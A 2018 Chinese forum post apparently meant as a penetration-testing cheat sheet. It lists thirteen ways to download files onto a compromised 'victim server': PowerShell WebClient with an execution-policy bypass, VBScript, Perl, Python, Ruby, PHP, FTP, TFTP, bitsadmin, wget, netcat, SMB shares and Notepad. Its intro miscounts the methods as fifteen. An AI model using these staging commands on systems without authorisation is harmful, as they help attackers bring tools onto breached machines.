anonymou5

 找回密码
 立即注册
搜索
查看: 99|回复: 2

13种方式下载文件

[复制链接]
匿名
匿名  发表于 2018-10-30 11:21:20 |阅读模式
渗透测试过程中常常遇到需要将文件下载到受害者服务器上,这里介绍15种下载文件的方式,希望能帮助到你。

0x01 Powershell

创建如下PSH脚本:
  1. $p = New-Object System.Net.WebClient
  2. $p.DownloadFile("http://domain/file","C:%homepath%file")
复制代码
执行:
  1. PS C:> .test.ps1
复制代码
如果Powershell禁止执行了,使用如下命令:
  1. C:>powershell set-executionpolicy unrestricted
复制代码
0x02 Visual Basic

创建如下VBS脚本。
  1. Set args = Wscript.Arguments
  2. Url = "http://domain/file"
  3. dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
  4. dim bStrm: Set bStrm = createobject("Adodb.Stream")
  5. xHttp.Open "GET", Url, False
  6. xHttp.Send
  7. with bStrm
  8.     .type = 1 '
  9.     .open
  10.     .write xHttp.responseBody
  11.     .savetofile " C:\%homepath%\file", 2 '
  12. end with
复制代码
执行:
  1. C:>cscript test.vbs
复制代码
0x03 Perl

脚本如下:
  1. #!/usr/bin/perl
  2. use LWP::Simple;
  3. getstore("http://domain/file", "file");
复制代码
执行:
  1. root@kali:~# perl test.pl
复制代码
0x04 Python

脚本如下:
  1. #!/usr/bin/python
  2. import urllib2
  3. u = urllib2.urlopen('http://domain/file')
  4. localFile = open('local_file', 'w')
  5. localFile.write(u.read())
  6. localFile.close()
复制代码
执行:
  1. root@kali:~# python test.py
复制代码
0x05 Ruby

脚本如下:
  1. #!/usr/bin/ruby
  2. require 'net/http'
  3. Net::HTTP.start("www.domain.com") { |http|
  4. r = http.get("/file")
  5. open("save_location", "wb") { |file|
  6. file.write(r.body)
  7. }
  8. }
复制代码
执行:
  1. root@kali:~# ruby test.rb
复制代码
0x06 PHP

脚本如下:
  1. #!/usr/bin/php
  2. <?php $data = @file("http://example.com/file");
  3. $lf = "local_file";         
  4. $fh = fopen($lf, 'w');         
  5. fwrite($fh, $data[0]);         
  6. fclose($fh);
  7. ?>
复制代码
执行:
  1. root@kali:~# php test.php
复制代码
0x07 FTP

执行如下命令:
  1. ftp 127.0.0.1 username password get file exit
复制代码
0x08 TFTP

执行如下命令:
  1. tftp -i host GET C:%homepath%file location_of_file_on_tftp_server
复制代码
0x09 Bitsadmin

执行如下命令:
  1. bitsadmin /transfer n http://domain/file c:%homepath%file
复制代码
0x10 Wget

执行如下命令:
  1. wget http://example.com/file
复制代码
0x11 Netcat

attacker执行如下命令:
  1. cat file | nc -l 1234
复制代码
target执行:
  1. nc host_ip 1234 > file
复制代码
0x12 Window 文件共享

使用如下命令:
  1. net use x: \127.0.0.1\share /user:example.comuserID myPassword
复制代码
0x13 记事本:

1.打开记事本
2.文件,打开
3.在文件名处填入下载地址



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

0

主题

23

帖子

134

积分

注册会员

Rank: 2

积分
134
发表于 2018-10-30 19:38:41 | 显示全部楼层
最后一条 出乎意料
回复

使用道具 举报

匿名
匿名  发表于 2018-10-31 09:37:30
FreeGo 发表于 2018-10-30 19:38
最后一条 出乎意料


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

( 蜀ICP备18025895号 )

GMT+8, 2018-11-20 19:36 , Processed in 0.112829 second(s), 21 queries .

Powered by anonymou5 0.1

快速回复 返回顶部 返回列表